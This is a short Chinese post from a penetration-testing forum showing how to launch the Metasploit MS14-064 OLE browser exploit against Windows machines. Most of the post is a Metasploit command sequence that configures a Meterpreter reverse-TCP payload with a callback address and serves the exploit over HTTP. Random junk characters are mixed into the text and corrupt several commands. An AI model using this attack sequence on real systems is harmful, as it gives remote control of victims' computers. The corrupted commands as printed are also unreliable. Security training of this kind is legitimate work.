我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示
) H6 u+ v( l# n. B. W) [. d. h) B4 F: l7 b* P
开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp1 d; ~" ^* ?; A, X8 P
set AllowPowershellPrompt true
# T+ d, L0 T/ g% n# R2 |$ n; O F( ?5 g Set LHOST 192.168.0.109/ J( l5 V& [) J& Z& ?7 e, U0 o
7 R+ W6 B+ { O8 V) j$ k set SRVHOST 192.168.0.109
6 G4 C" A+ X- e) n* O* GSet uripath share
+ h; b# v8 ]2 {1 t# e- V- ~9 hSet srvport 80) _8 Z3 j, W% t' \
% Y) A3 Y$ y0 m+ E: n7 Z1 ?) a! ?0 I
; x5 k6 d Q9 m9 b* l
4 i+ w( `" _' R
d* z4 ^0 \- O" l# s( L/ g8 r* E3 M. A: G3 D. j1 E. E
下面我们来访问本地地址如图:
, ?$ ?( O L5 N7 `" v; t+ |0 }4 a' {, M+ P! Q# |. J+ I6 q
! x' W2 N5 g8 |2 y$ b, e! L/ z8 c' K( l/ I& f/ s
# M3 m8 ?6 N( @5 c" j9 N6 h; x. y. [, j- _+ E. S. s
$ n& I; n$ B+ [: Y ]3 a
| 欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) | Powered by Discuz! X3.2 |